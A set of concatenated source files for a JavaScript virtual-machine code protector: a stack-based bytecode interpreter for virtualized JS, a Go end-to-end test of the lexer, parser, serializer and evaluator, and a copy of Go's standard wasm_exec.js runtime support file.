a10.push(cbbb)
cbb_xc.splice(0,0, a10)
a10 = cbb_xc.pop()
a1 = a10[0]
a2 = a10[1]
a3 = a10[2]
a4 = a10[3]
a5 = a10[4]
a6 = a10[5]
a7 = a10[6]
a8 = a10[7]
a9 = a10[8]
duei = a10[9]
start = a10[10]
cbbb = a10[11]
shuz = codeOfmyfun
jsq = 0
}
}
let s_cbb = shuz[start++];
switch(s_cbb){
case 23:
all = cbbb
duei.push(cbbb)
break
case 47:
duei.push(allthis)
break
case 36:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 <= a1;
duei.push(a1)
break
case 37:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 >= a1;
duei.push(a1)
break
case 38:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 > a1;
duei.push(a1)
break
case 39:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 == a1;
duei.push(a1)
break
case 48:
a1 = shuz[start++] * 2
a3 = []
a4 = []
for (a2=0; a2< a1;a2++){
if (a2 < a1/2){
a3.splice(0,0,duei.pop())
}else{
a4.splice(0,0,duei.pop())
}
}
a1 = duei.pop()
for (a2=0; a2 < a3.length; a2++){
if (a4[a2] == a1){
start += a3[a2]
break
}
else if (a4[a2] == null){
start += a3[a2]
break
}
}
break
case 53:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 === a1;
duei.push(a1)
break
case 54:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 !== a1;
duei.push(a1)
break
case 550:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 != a1;
duei.push(a1)
break
case 551:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 in a1;
duei.push(a1)
break
case 22:
a1 = shuz[start++]
a2 = duei.pop()
a3 = duei.pop()
a2[constantPool[a1]] = a3
break
case 19:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 - a1;
duei.push(a1)
break
case 291:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 - a1;
duei.push(a1)
break
case 20:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 + a1;
duei.push(a1)
break
case 24:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 < a1;
duei.push(a1)
break
case 240:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 < a1;
duei.push(a1)
break
case 27:
a1 = duei.pop()
a2 = duei.pop()
a1 = a1 * a2;
duei.push(a1)
break
case 28:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 % a1;
duei.push(a1)
break
case 29:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 ^ a1;
duei.push(a1)
break
case 30:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 / a1;
duei.push(a1)
break
case 194:
debugger;
break
case 25:
a1 = duei.pop()
a2 = shuz[start++]
if (!a1) {
start += a2;
}
;break
case 31:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 << a1;
duei.push(a1)
break
case 32:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 | a1;
duei.push(a1)
break
case 26:
a1 = duei.pop()
a3 = shuz[start++]
a1[ constantPool[a3]] += 1
break
case 190:
a1 = shuz[start++]
start += a1
break
case 192:
a1 = duei.pop()
a3 = shuz[start++]
if (a1) {
start += a3
}
break
case 33:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 >> a1;
duei.push(a1)
break
case 34:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 >>> a1;
duei.push(a1)
break
case 52:
a1 = duei.pop()
a3 = shuz[start++]
a1[ constantPool[a3]] -= 1
break
case 104:
duei.push({})
break
case 105:
duei.push([])
break
case 57:
i = []
a3 = shuz[start++]
a2 = duei.pop()
for (a1 in a2){
i.push(a1)
}
cbbb['for_in_xh_cbb_list'+a3] = i
break
case 51:
a1 = duei.pop()
a2 = shuz[start++]
if (!a1) {
start += a2;
duei.push(a1)
}
;break
case 252:
a1 = duei.pop()
a2 = shuz[start++]
if (a1) {
start += a2;
duei.push(a1)
}
;break
case 195:
a2 = shuz[start++]
a3 = shuz[start++]
a4 = shuz[start++]
try{
a6 = cbb_jsvmp(a3, start, start, duei, args.length, 1, {
"shuz":shuz,
"cbbb":cbbb,
"allthis":allthis,
"argsList":argsList,
"args":args,
"duei":duei,
"all": all,
"a7":a7
})
start = a2+start;
if (a6 == "-90_cbb"){
return a6
}
}catch(e){
a7 = e
start = a2+start;
a6 = cbb_jsvmp(a1, start, start, duei, args.length, 1, {
"shuz":shuz,
"cbbb":cbbb,
"allthis":allthis,
"args":args,
"argsList":argsList,
"duei":duei,
"all": all,
"a7":a7
})
if (a6 == "-90_cbb"){
return a6
}
}finally{
if (a6 == "-90_cbb"){
return a6
}
start = a3+start;
a6 = cbb_jsvmp(a3, start, start, duei, args.length, 1, {
"shuz":shuz,
"cbbb":cbbb,
"allthis":allthis,
"argsList":argsList,
"args":args,
"duei":duei,
"all": all,
"a7":a7
})
if (a6 == "-90_cbb"){
return a6
}
start =start+ a4
}
break
case 35:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 & a1;
duei.push(a1)
break
case 8:
a1 = shuz[start++]
a2 = shuz[start++]
a1 = new RegExp( constantPool[a1], constantPool[a2]) ;
duei.push(a1)
break
case 10:
a1 = shuz[start++]
duei.push(constantPool[a1])
break
case 11:
a1 = shuz[start++]
duei.push(a1)
break
case 58:
a1 = duei.pop()
throw a1
break
case 40:
a1 = duei.pop()
a2 = duei.pop()
a2.push(a1);
duei.push(a2)
break
case 1:
a8 = duei.length
for (a1=0; a1< a8; a1++){
a7 = duei.pop()
if (a7 ==="cbbiyhh.online"){
break
}
let g = a7
if (changlc[cbbb.variablePool[g]].isfunmr){
a9 = {
"variablePool":{},
"fg":changlc[cbbb.variablePool[g]].af
}
a9.__proto__ = cbbb
cltothis(a9.variablePool,changlc[cbbb.variablePool[g]].variablePool)
cltothis(a9,a9['variablePool'], 1)
cbbb[g] = a9;
continue
}
cbbb[g] = function(){
let g2 = []
var huuuu = this
if (offnew == 1){
offnew=0
a9 = {
"variablePool":{},
"arguments": arguments,
"zhili":[]
}
a9.__proto__ = cbbb
cltothis(a9.variablePool,changlc[cbbb.variablePool[g]].variablePool)
cltothis(a9,a9['variablePool'], 1)
cltothis(a9['zhili'], changlc[cbbb.variablePool[g]].zhili)
a6 = cbb_jsvmp(a9, g2, 0, a9['zhili'],arguments, huuuu)
return huuuu;
}else{
a9 = {
"variablePool":{},
"arguments": arguments,
"zhili":[]
}
cltothis(a9['variablePool'],changlc[cbbb.variablePool[g]].variablePool)
cltothis(a9,a9['variablePool'], 1)
cltothis(a9['zhili'], changlc[cbbb.variablePool[g]].zhili)
a9.__proto__ = cbbb
a6 = cbb_jsvmp(a9, g2, 0, a9['zhili'],arguments, huuuu)
}
if (g2.length == 0){
return undefined
}else{
let h = g2.pop()
for (;1==1;){
if (g2.length == 0){
break
}else{
g2.pop()
}
}
return h
}
}
}
break
case 2:
a1 = duei.length
for (a2 = 0; a2 < a1; a2++){
a3 = duei.shift()
if (argsList[a2] != undefined ){
cbbb[a3] = argsList[a2];
}
}
break
case 90:
a1 = duei.pop()
a2 = duei.pop()
a3 = duei.pop()
if (a3.variablePool != undefined){
getproto(a3,a2,a1)
}else{
a3[a2] = a1
}
break
case 290:
a1 = duei.pop()
a2 = duei.pop()
a3 = duei.pop()
if (a3.variablePool != undefined){
getproto(a3,a2,a1)
}else{
a3[a2] = a1
}
break
case 44:
a5 = duei.pop()
duei.push(~a5)
break
case 49:
a5 = duei.pop()
duei.push(typeof a5)
break
case 50:
a5 = duei.pop()
duei.push(- a5)
break
case 45:
a1 = duei.pop()
a2 = duei.pop()
a3 = duei.pop()
if (a3.variablePool != undefined){
getproto(a3,a2,a1)
}else{
a3[a2] = a1
}
duei.push(a3)
break
case 55:
a1 = duei.pop()
a2 = duei.pop()
a3 = delete a2[a1];
duei.push(a3)
break
case 56:
a5 = duei.pop()
duei.push(void a5)
break
case 60:
a5 = duei.pop()
duei.push(!a5)
break
case 197:
j = duei.pop()
j2 = duei.pop()
if (j2.variablePool != undefined){
getproto(j2,j,a7)
}else{
j2[j] = a1
}
break
case 46:
a1 = shuz[start++]
a3 = duei.pop()
args = []
for (a2=0; a2<a1; a2++ ){
args.splice(0,0,duei.pop())
}
offnew = 1
if (a3 == RegExp) {
a4 = new RegExp(args[0], args[1])
} else {
a4 = new a3(...args)
}
offnew = 0
duei.push(a4)
break
case 150:
a1 = shuz[start++]
a3 = duei.pop()
args = []
for (a2=0; a2<a1; a2++ ){
args.splice(0,0,duei.pop())
}
let found = false;
for (let key of Object.getOwnPropertyNames(window)) {
if (typeof window[key] === 'function' && a3 === window[key]) {
a4 = window[key](...args)
found = true;
break;
}
}
if (!found) {
a4 = a3.apply(all, args)
}
duei.push(a4)
break
case 181:
a1 = duei.pop();
a2 = duei.pop();
try{
a1 = a2[a1]
}catch(e){
a1 = window[a1]
}
all = a2
duei.push(a1)
break
case 1810:
a1 = duei.pop();
break
case 1811:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 instanceof a1;
duei.push(a1)
break
case 1812:
a1 = {
"a1": shuz,
"a2": start,
"a3": duei,
"a4": cbbb
}
baoChen.push(a1)
break
case 1813:
a1 = duei.pop()
shuz = codeOfmyfun
start = a1['fg']
cbbb = a1
break
case 1814:
if (og === 1){
a10 = cbb_xc.pop()
if (!a10){
a1 = baoChen.pop()
shuz = a1.a1
start = a1.a2+1
duei = a1.a3
cbbb = a1.a4
og = 0
jsq = 0
}else {
a1 = a10[0]
a2 = a10[1]
a3 = a10[2]
a4 = a10[3]
a5 = a10[4]
a6 = a10[5]
a7 = a10[6]
a8 = a10[7]
a9 = a10[8]
duei = a10[9]
start = a10[10]
cbbb = a10[11]
shuz = codeOfmyfun
jsq = 0
}
break
}
a2 = duei.pop()
while (1){
a1 = duei.pop()
if (a1 === "cbbiyhh_dgggg_opopop"){
break
}
}
break
case 1815:
a1 = duei.pop()
a2 = duei.pop()
a3 = duei.pop()
if (a2.variablePool != undefined){
getproto(a2,a1,a3)
}else{
a2[a1] = a3
}
break
case 1816:
a1 = baoChen.pop()
shuz = a1.a1
start = a1.a2+1
cbbb = a1.a4
duei.push(a2)
break
case 1818:
a1 = []
while (1){
a2 = duei.pop()
if (a2 === "cbb_isokk_yhh_very_p"){
break
}
a1.push(a2)
}
duei.push(a1)
break
case 1819:
og = 1
a10 = cbb_xc.pop()
a1 = a10[0]
a2 = a10[1]
a3 = a10[2]
a4 = a10[3]
a5 = a10[4]
a6 = a10[5]
a7 = a10[6]
a8 = a10[7]
a9 = a10[8]
duei = a10[9]
start = a10[10]
cbbb = a10[11]
shuz = codeOfmyfun
jsq = 0
break
case 1820:
lp = 1
break
case 1821:
lp = 0
break
case 1817:
a10 = []
a10.push(a1)
a10.push(a2)
a10.push(a3)
a10.push(a4)
a10.push(a5)
a10.push(a6)
a10.push(a7)
a10.push(a8)
a10.push(a9)
a10.push(duei.pop())
a10.push(duei.pop())
a10.push(duei.pop())
cbb_xc.push(a10)
break
case 200:
return
default:
return "-90_cbb"
}
}
}
// --- VM bootstrap ---------------------------------------------------------
// When running under Node (no global `window`), fabricate a window-like
// object exposing the CommonJS module globals and inheriting from `global`.
// NOTE(review): in a real browser (`this.window` truthy) `cywindow` is never
// declared, so the lines below would throw a ReferenceError — confirm this
// entry file is Node-only.
if (!this.window){var cywindow = {"exports": exports,"require": require,"module":module,"__dirname":__dirname,"__filename":__filename};cywindow.__proto__=global;window=global};
// Flag consumed by the interpreter's constructor handling (opcode 46):
// 0 = ordinary call, 1 = `new` invocation in progress.
offnew = 0
// Seed the top-level scope record with the entry function's variable pool
// and instruction stream ("zhili") from the compiled program table `changlc`.
cywindow['variablePool'] = {}
cywindow['zhili'] = []
cltothis(cywindow['variablePool'],changlc.awcbb_yhh_fun0.variablePool)
cltothis(cywindow['zhili'], changlc.awcbb_yhh_fun0.zhili)
// Start interpreting the entry function's bytecode with an empty operand stack.
cbb_jsvmp( cywindow, [], 0, changlc.awcbb_yhh_fun0.zhili)
|
2833844911/gojsvmp | 1,125 | parseToDt/parseToDt_test.go | package parseToDt
import (
"fmt"
"myvmp/ast"
"myvmp/evaluator"
"myvmp/lexer"
"myvmp/parse"
"myvmp/promise"
"testing"
)
// TestNextTokenee is an end-to-end smoke test of the custom JS toolchain:
// it lexes and parses the embedded script, serializes the resulting AST
// with PrushData, reloads it with LoadStr, and evaluates the reloaded tree.
// The script exercises arithmetic/string coercion, a constructor used with
// `new`, JSON parse/stringify, and try/catch (the reference to the undefined
// identifier `dde` intentionally forces the catch branch).
func TestNextTokenee(t *testing.T) {
	// JS program under test — this is data fed to the lexer, not Go code.
	code := `
	l = "dd";
	var dd = (1 + "aaal" + 32) * 2 / 321 + "dsadas";
	ff = 100 + dd + dd;
	lp = ff == "ewewq";
	var kpd = dd + "d" + lp + (90 + (80 >> 434)) * 3;
	function dasddddIIeee(a, b) {
	l = l + a + b;
	this["ppp"] = function() {
	l = 100 + "dsd" + 'ss';
	}
	;
	this["lp"] = 100 + this.l;
	}
	;
	var lppp = new dasddddIIeee(1,2);
	lppp['ppp']();
	try {
	dasd = '{\'a\':"100",\"b\":{\'a\':100}}'
	dd = JSON["parse"](dasd);
	cyout("====", dd['b']['a']);
	dd = JSON["stringify"](dd);
	cyout("====", dd);
	dd['l'] = this
	dd = JSON["stringify"](dde);
	} catch(a) {
	cyout("==== 重新");
	}
	cyout("==== 结束 ====", dd);
	`
	// Initialize the promise/event machinery before any evaluation runs.
	promise.CyJSInit()
	// Lex the source and pull the full token stream.
	dt := lexer.New(code)
	kk := (*dt).Input()
	// Parse tokens into a statement list and wrap it in a Program node.
	kpp := parse.New(kk)
	fff := kpp.ParseAst()
	dtt := &ast.Program{Body: fff}
	dtt.StatementNode()
	// Round-trip the AST through its string serialization.
	dd := PrushData(dtt)
	fmt.Println(dd)
	ss := LoadStr(dd)
	dyy := ss.(*ast.Program)
	// Execute the reloaded program, then drain pending promises/timers.
	evaluator.StartEval(dyy.Body)
	promise.Done()
}
|
2833844911/gojsvmp | 16,687 | static/wasm_exec.js | // Copyright 2018 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
"use strict";
(() => {
const enosys = () => {
const err = new Error("not implemented");
err.code = "ENOSYS";
return err;
};
if (!globalThis.fs) {
let outputBuf = "";
globalThis.fs = {
constants: { O_WRONLY: -1, O_RDWR: -1, O_CREAT: -1, O_TRUNC: -1, O_APPEND: -1, O_EXCL: -1 }, // unused
writeSync(fd, buf) {
outputBuf += decoder.decode(buf);
const nl = outputBuf.lastIndexOf("\n");
if (nl != -1) {
console.log(outputBuf.substring(0, nl));
outputBuf = outputBuf.substring(nl + 1);
}
return buf.length;
},
write(fd, buf, offset, length, position, callback) {
if (offset !== 0 || length !== buf.length || position !== null) {
callback(enosys());
return;
}
const n = this.writeSync(fd, buf);
callback(null, n);
},
chmod(path, mode, callback) { callback(enosys()); },
chown(path, uid, gid, callback) { callback(enosys()); },
close(fd, callback) { callback(enosys()); },
fchmod(fd, mode, callback) { callback(enosys()); },
fchown(fd, uid, gid, callback) { callback(enosys()); },
fstat(fd, callback) { callback(enosys()); },
fsync(fd, callback) { callback(null); },
ftruncate(fd, length, callback) { callback(enosys()); },
lchown(path, uid, gid, callback) { callback(enosys()); },
link(path, link, callback) { callback(enosys()); },
lstat(path, callback) { callback(enosys()); },
mkdir(path, perm, callback) { callback(enosys()); },
open(path, flags, mode, callback) { callback(enosys()); },
read(fd, buffer, offset, length, position, callback) { callback(enosys()); },
readdir(path, callback) { callback(enosys()); },
readlink(path, callback) { callback(enosys()); },
rename(from, to, callback) { callback(enosys()); },
rmdir(path, callback) { callback(enosys()); },
stat(path, callback) { callback(enosys()); },
symlink(path, link, callback) { callback(enosys()); },
truncate(path, length, callback) { callback(enosys()); },
unlink(path, callback) { callback(enosys()); },
utimes(path, atime, mtime, callback) { callback(enosys()); },
};
}
if (!globalThis.process) {
globalThis.process = {
getuid() { return -1; },
getgid() { return -1; },
geteuid() { return -1; },
getegid() { return -1; },
getgroups() { throw enosys(); },
pid: -1,
ppid: -1,
umask() { throw enosys(); },
cwd() { throw enosys(); },
chdir() { throw enosys(); },
}
}
if (!globalThis.crypto) {
throw new Error("globalThis.crypto is not available, polyfill required (crypto.getRandomValues only)");
}
if (!globalThis.performance) {
throw new Error("globalThis.performance is not available, polyfill required (performance.now only)");
}
if (!globalThis.TextEncoder) {
throw new Error("globalThis.TextEncoder is not available, polyfill required");
}
if (!globalThis.TextDecoder) {
throw new Error("globalThis.TextDecoder is not available, polyfill required");
}
const encoder = new TextEncoder("utf-8");
const decoder = new TextDecoder("utf-8");
globalThis.Go = class {
constructor() {
this.argv = ["js"];
this.env = {};
this.exit = (code) => {
if (code !== 0) {
console.warn("exit code:", code);
}
};
this._exitPromise = new Promise((resolve) => {
this._resolveExitPromise = resolve;
});
this._pendingEvent = null;
this._scheduledTimeouts = new Map();
this._nextCallbackTimeoutID = 1;
const setInt64 = (addr, v) => {
this.mem.setUint32(addr + 0, v, true);
this.mem.setUint32(addr + 4, Math.floor(v / 4294967296), true);
}
const setInt32 = (addr, v) => {
this.mem.setUint32(addr + 0, v, true);
}
const getInt64 = (addr) => {
const low = this.mem.getUint32(addr + 0, true);
const high = this.mem.getInt32(addr + 4, true);
return low + high * 4294967296;
}
const loadValue = (addr) => {
const f = this.mem.getFloat64(addr, true);
if (f === 0) {
return undefined;
}
if (!isNaN(f)) {
return f;
}
const id = this.mem.getUint32(addr, true);
return this._values[id];
}
const storeValue = (addr, v) => {
const nanHead = 0x7FF80000;
if (typeof v === "number" && v !== 0) {
if (isNaN(v)) {
this.mem.setUint32(addr + 4, nanHead, true);
this.mem.setUint32(addr, 0, true);
return;
}
this.mem.setFloat64(addr, v, true);
return;
}
if (v === undefined) {
this.mem.setFloat64(addr, 0, true);
return;
}
let id = this._ids.get(v);
if (id === undefined) {
id = this._idPool.pop();
if (id === undefined) {
id = this._values.length;
}
this._values[id] = v;
this._goRefCounts[id] = 0;
this._ids.set(v, id);
}
this._goRefCounts[id]++;
let typeFlag = 0;
switch (typeof v) {
case "object":
if (v !== null) {
typeFlag = 1;
}
break;
case "string":
typeFlag = 2;
break;
case "symbol":
typeFlag = 3;
break;
case "function":
typeFlag = 4;
break;
}
this.mem.setUint32(addr + 4, nanHead | typeFlag, true);
this.mem.setUint32(addr, id, true);
}
const loadSlice = (addr) => {
const array = getInt64(addr + 0);
const len = getInt64(addr + 8);
return new Uint8Array(this._inst.exports.mem.buffer, array, len);
}
const loadSliceOfValues = (addr) => {
const array = getInt64(addr + 0);
const len = getInt64(addr + 8);
const a = new Array(len);
for (let i = 0; i < len; i++) {
a[i] = loadValue(array + i * 8);
}
return a;
}
const loadString = (addr) => {
const saddr = getInt64(addr + 0);
const len = getInt64(addr + 8);
return decoder.decode(new DataView(this._inst.exports.mem.buffer, saddr, len));
}
const timeOrigin = Date.now() - performance.now();
this.importObject = {
_gotest: {
add: (a, b) => a + b,
},
gojs: {
// Go's SP does not change as long as no Go code is running. Some operations (e.g. calls, getters and setters)
// may synchronously trigger a Go event handler. This makes Go code get executed in the middle of the imported
// function. A goroutine can switch to a new stack if the current stack is too small (see morestack function).
// This changes the SP, thus we have to update the SP used by the imported function.
// func wasmExit(code int32)
"runtime.wasmExit": (sp) => {
sp >>>= 0;
const code = this.mem.getInt32(sp + 8, true);
this.exited = true;
delete this._inst;
delete this._values;
delete this._goRefCounts;
delete this._ids;
delete this._idPool;
this.exit(code);
},
// func wasmWrite(fd uintptr, p unsafe.Pointer, n int32)
"runtime.wasmWrite": (sp) => {
sp >>>= 0;
const fd = getInt64(sp + 8);
const p = getInt64(sp + 16);
const n = this.mem.getInt32(sp + 24, true);
fs.writeSync(fd, new Uint8Array(this._inst.exports.mem.buffer, p, n));
},
// func resetMemoryDataView()
"runtime.resetMemoryDataView": (sp) => {
sp >>>= 0;
this.mem = new DataView(this._inst.exports.mem.buffer);
},
// func nanotime1() int64
"runtime.nanotime1": (sp) => {
sp >>>= 0;
setInt64(sp + 8, (timeOrigin + performance.now()) * 1000000);
},
// func walltime() (sec int64, nsec int32)
"runtime.walltime": (sp) => {
sp >>>= 0;
const msec = (new Date).getTime();
setInt64(sp + 8, msec / 1000);
this.mem.setInt32(sp + 16, (msec % 1000) * 1000000, true);
},
// func scheduleTimeoutEvent(delay int64) int32
"runtime.scheduleTimeoutEvent": (sp) => {
sp >>>= 0;
const id = this._nextCallbackTimeoutID;
this._nextCallbackTimeoutID++;
this._scheduledTimeouts.set(id, setTimeout(
() => {
this._resume();
while (this._scheduledTimeouts.has(id)) {
// for some reason Go failed to register the timeout event, log and try again
// (temporary workaround for https://github.com/golang/go/issues/28975)
console.warn("scheduleTimeoutEvent: missed timeout event");
this._resume();
}
},
getInt64(sp + 8),
));
this.mem.setInt32(sp + 16, id, true);
},
// func clearTimeoutEvent(id int32)
"runtime.clearTimeoutEvent": (sp) => {
sp >>>= 0;
const id = this.mem.getInt32(sp + 8, true);
clearTimeout(this._scheduledTimeouts.get(id));
this._scheduledTimeouts.delete(id);
},
// func getRandomData(r []byte)
"runtime.getRandomData": (sp) => {
sp >>>= 0;
crypto.getRandomValues(loadSlice(sp + 8));
},
// func finalizeRef(v ref)
"syscall/js.finalizeRef": (sp) => {
sp >>>= 0;
const id = this.mem.getUint32(sp + 8, true);
this._goRefCounts[id]--;
if (this._goRefCounts[id] === 0) {
const v = this._values[id];
this._values[id] = null;
this._ids.delete(v);
this._idPool.push(id);
}
},
// func stringVal(value string) ref
"syscall/js.stringVal": (sp) => {
sp >>>= 0;
storeValue(sp + 24, loadString(sp + 8));
},
// func valueGet(v ref, p string) ref
"syscall/js.valueGet": (sp) => {
sp >>>= 0;
const result = Reflect.get(loadValue(sp + 8), loadString(sp + 16));
sp = this._inst.exports.getsp() >>> 0; // see comment above
storeValue(sp + 32, result);
},
// func valueSet(v ref, p string, x ref)
"syscall/js.valueSet": (sp) => {
sp >>>= 0;
Reflect.set(loadValue(sp + 8), loadString(sp + 16), loadValue(sp + 32));
},
// func valueDelete(v ref, p string)
"syscall/js.valueDelete": (sp) => {
sp >>>= 0;
Reflect.deleteProperty(loadValue(sp + 8), loadString(sp + 16));
},
// func valueIndex(v ref, i int) ref
"syscall/js.valueIndex": (sp) => {
sp >>>= 0;
storeValue(sp + 24, Reflect.get(loadValue(sp + 8), getInt64(sp + 16)));
},
// valueSetIndex(v ref, i int, x ref)
"syscall/js.valueSetIndex": (sp) => {
sp >>>= 0;
Reflect.set(loadValue(sp + 8), getInt64(sp + 16), loadValue(sp + 24));
},
// func valueCall(v ref, m string, args []ref) (ref, bool)
"syscall/js.valueCall": (sp) => {
sp >>>= 0;
try {
const v = loadValue(sp + 8);
const m = Reflect.get(v, loadString(sp + 16));
const args = loadSliceOfValues(sp + 32);
const result = Reflect.apply(m, v, args);
sp = this._inst.exports.getsp() >>> 0; // see comment above
storeValue(sp + 56, result);
this.mem.setUint8(sp + 64, 1);
} catch (err) {
sp = this._inst.exports.getsp() >>> 0; // see comment above
storeValue(sp + 56, err);
this.mem.setUint8(sp + 64, 0);
}
},
// func valueInvoke(v ref, args []ref) (ref, bool)
"syscall/js.valueInvoke": (sp) => {
sp >>>= 0;
try {
const v = loadValue(sp + 8);
const args = loadSliceOfValues(sp + 16);
const result = Reflect.apply(v, undefined, args);
sp = this._inst.exports.getsp() >>> 0; // see comment above
storeValue(sp + 40, result);
this.mem.setUint8(sp + 48, 1);
} catch (err) {
sp = this._inst.exports.getsp() >>> 0; // see comment above
storeValue(sp + 40, err);
this.mem.setUint8(sp + 48, 0);
}
},
// func valueNew(v ref, args []ref) (ref, bool)
"syscall/js.valueNew": (sp) => {
sp >>>= 0;
try {
const v = loadValue(sp + 8);
const args = loadSliceOfValues(sp + 16);
const result = Reflect.construct(v, args);
sp = this._inst.exports.getsp() >>> 0; // see comment above
storeValue(sp + 40, result);
this.mem.setUint8(sp + 48, 1);
} catch (err) {
sp = this._inst.exports.getsp() >>> 0; // see comment above
storeValue(sp + 40, err);
this.mem.setUint8(sp + 48, 0);
}
},
// func valueLength(v ref) int
"syscall/js.valueLength": (sp) => {
sp >>>= 0;
setInt64(sp + 16, parseInt(loadValue(sp + 8).length));
},
// valuePrepareString(v ref) (ref, int)
"syscall/js.valuePrepareString": (sp) => {
sp >>>= 0;
const str = encoder.encode(String(loadValue(sp + 8)));
storeValue(sp + 16, str);
setInt64(sp + 24, str.length);
},
// valueLoadString(v ref, b []byte)
"syscall/js.valueLoadString": (sp) => {
sp >>>= 0;
const str = loadValue(sp + 8);
loadSlice(sp + 16).set(str);
},
// func valueInstanceOf(v ref, t ref) bool
"syscall/js.valueInstanceOf": (sp) => {
sp >>>= 0;
this.mem.setUint8(sp + 24, (loadValue(sp + 8) instanceof loadValue(sp + 16)) ? 1 : 0);
},
// func copyBytesToGo(dst []byte, src ref) (int, bool)
"syscall/js.copyBytesToGo": (sp) => {
sp >>>= 0;
const dst = loadSlice(sp + 8);
const src = loadValue(sp + 32);
if (!(src instanceof Uint8Array || src instanceof Uint8ClampedArray)) {
this.mem.setUint8(sp + 48, 0);
return;
}
const toCopy = src.subarray(0, dst.length);
dst.set(toCopy);
setInt64(sp + 40, toCopy.length);
this.mem.setUint8(sp + 48, 1);
},
// func copyBytesToJS(dst ref, src []byte) (int, bool)
"syscall/js.copyBytesToJS": (sp) => {
sp >>>= 0;
const dst = loadValue(sp + 8);
const src = loadSlice(sp + 16);
if (!(dst instanceof Uint8Array || dst instanceof Uint8ClampedArray)) {
this.mem.setUint8(sp + 48, 0);
return;
}
const toCopy = src.subarray(0, dst.length);
dst.set(toCopy);
setInt64(sp + 40, toCopy.length);
this.mem.setUint8(sp + 48, 1);
},
"debug": (value) => {
console.log(value);
},
}
};
}
async run(instance) {
if (!(instance instanceof WebAssembly.Instance)) {
throw new Error("Go.run: WebAssembly.Instance expected");
}
this._inst = instance;
this.mem = new DataView(this._inst.exports.mem.buffer);
this._values = [ // JS values that Go currently has references to, indexed by reference id
NaN,
0,
null,
true,
false,
globalThis,
this,
];
this._goRefCounts = new Array(this._values.length).fill(Infinity); // number of references that Go has to a JS value, indexed by reference id
this._ids = new Map([ // mapping from JS values to reference ids
[0, 1],
[null, 2],
[true, 3],
[false, 4],
[globalThis, 5],
[this, 6],
]);
this._idPool = []; // unused ids that have been garbage collected
this.exited = false; // whether the Go program has exited
// Pass command line arguments and environment variables to WebAssembly by writing them to the linear memory.
let offset = 4096;
const strPtr = (str) => {
const ptr = offset;
const bytes = encoder.encode(str + "\0");
new Uint8Array(this.mem.buffer, offset, bytes.length).set(bytes);
offset += bytes.length;
if (offset % 8 !== 0) {
offset += 8 - (offset % 8);
}
return ptr;
};
const argc = this.argv.length;
const argvPtrs = [];
this.argv.forEach((arg) => {
argvPtrs.push(strPtr(arg));
});
argvPtrs.push(0);
const keys = Object.keys(this.env).sort();
keys.forEach((key) => {
argvPtrs.push(strPtr(`${key}=${this.env[key]}`));
});
argvPtrs.push(0);
const argv = offset;
argvPtrs.forEach((ptr) => {
this.mem.setUint32(offset, ptr, true);
this.mem.setUint32(offset + 4, 0, true);
offset += 8;
});
// The linker guarantees global data starts from at least wasmMinDataAddr.
// Keep in sync with cmd/link/internal/ld/data.go:wasmMinDataAddr.
const wasmMinDataAddr = 4096 + 8192;
if (offset >= wasmMinDataAddr) {
throw new Error("total length of command line and environment variables exceeds limit");
}
this._inst.exports.run(argc, argv);
if (this.exited) {
this._resolveExitPromise();
}
await this._exitPromise;
}
	/**
	 * Re-enter the Go scheduler after a JS-side event (timer callback or a
	 * call into an exported Go function). Throws if the program already
	 * exited; resolves the exit promise if it exits during this resume.
	 */
	_resume() {
		if (this.exited) {
			throw new Error("Go program has already exited");
		}
		// Hand control back to the wasm side; Go runs until it blocks again.
		this._inst.exports.resume();
		if (this.exited) {
			this._resolveExitPromise();
		}
	}
	/**
	 * Build a JS function that forwards calls into Go: each invocation
	 * records (callback id, `this`, arguments) as the pending event, resumes
	 * the Go scheduler, and returns whatever the Go handler stored in
	 * `event.result`.
	 */
	_makeFuncWrapper(id) {
		const go = this;
		return function () {
			const event = { id: id, this: this, args: arguments };
			go._pendingEvent = event;
			go._resume();
			return event.result;
		};
	}
}
})();
|
2833844911/cy_jsvmp | 19,519 | tool/jsvmp_outcs.js | function cltothis(cythis, poolList,off){
for (let i in poolList){
if (off == 1){
cythis[i] = undefined
}else{
cythis[i] = poolList[i];
}
}
}
// Stash the environment's original fetch before the VM bootstrap below runs
// — presumably so virtualized code can still reach the real fetch after any
// hooking. NOTE(review): assumes a browser-like global `window`; confirm.
window._fetch = window.fetch
function cbb_jsvmp(all, duei, start, shuz,argsList, ogg, op) {
function getproto(s,d,e){
let dt = s;
for ( ;1==1;){
if (s.hasOwnProperty(d)){
try{
s[d] = e
}catch(e2){
this[d] = e
return
}
break
}else{
s = s.__proto__
if (s == undefined || s==null){
window[d] = e
return
}else{
a9 =9
}
}
}
}
if (op !==undefined){
var allthis
allthis = op['allthis']
duei = op.duei
all = op.all
shuz = op.shuz
argsList = op.argsList
var a1,a2,a3,a4,a5,a6,a7,a8,a9,j, j2,i ;
a7 = op.a7
var args = op.args
var cbbb = op.cbbb;
}else{
var allthis
if (ogg !== undefined){
allthis = ogg
}else{
allthis = all
}
var a1,a2,a3,a4,a5,a6,a7,a8,a9,j, j2, i;
var args = []
var cbbb = all;
}
CbbCs(duei, [duei.push, duei.pop, duei.shift, duei.sf])
Cbb([], [])
while (!![]) {
let s_cbb = shuz[start++];
switch(s_cbb){
case 23:
all = cbbb
a1 = duei.push(cbbb)
break
case 47:
a2 = duei.push(allthis)
break
case 36:
